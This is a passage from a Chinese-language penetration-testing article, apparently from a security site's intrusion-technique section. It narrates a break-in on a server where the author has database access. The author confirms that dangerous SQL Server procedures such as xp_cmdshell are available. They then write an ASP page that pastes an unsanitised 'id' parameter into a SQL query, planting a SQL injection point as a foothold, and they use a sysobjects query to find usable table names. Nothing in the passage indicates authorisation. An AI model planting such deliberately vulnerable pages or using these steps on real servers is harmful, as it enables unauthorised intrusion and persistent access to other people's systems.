不过db权限的数据库也暂时够我们用了。
Db权限的数据库?大家想到了什么?呵呵。对了。
Db 权限的注入点可以列目录啊。既然服务器允许我们跳转到3级目录(这只是暂时的猜想,
因为毕竟暂时只有一个3级目录被我们跳转了)。
XP_CMDSHELL............. 存在!
SP_OACREATE............. 存在!
XP_REGWRITE............. 存在!
XP_SERVICECONTROL 存在!
经查询。这些都还在。那就好办了。
直接构造注入点吧。
<!--#include file="xx.asp"-->
<%
set rs=server.createobject("ADODB.recordset")
id = request("id")
strSQL = "select * from admin where id=" & id
rs.open strSQL,conn,1,3
rs.close
%>
这里的admin必须是一个存在的表名。
我们可以通过SQL连接工具执行SQL命令查询。
select name from sysobjects where type='U'
查询出我们需要的表名。或者我也在 ../ conn/encode.asp
这个文件里找到这一句。sql="select count (*) from login where id="&cint(myid)
很明显。这里的login就可以被我们用上。
strSQL = "select * from login where id=" & id 我们构造出这样的语句替换到上面的代码中。
至此。终于有了突破。成功构造了注入点。
安全中国首页 > 文章中心 > 渗透技术
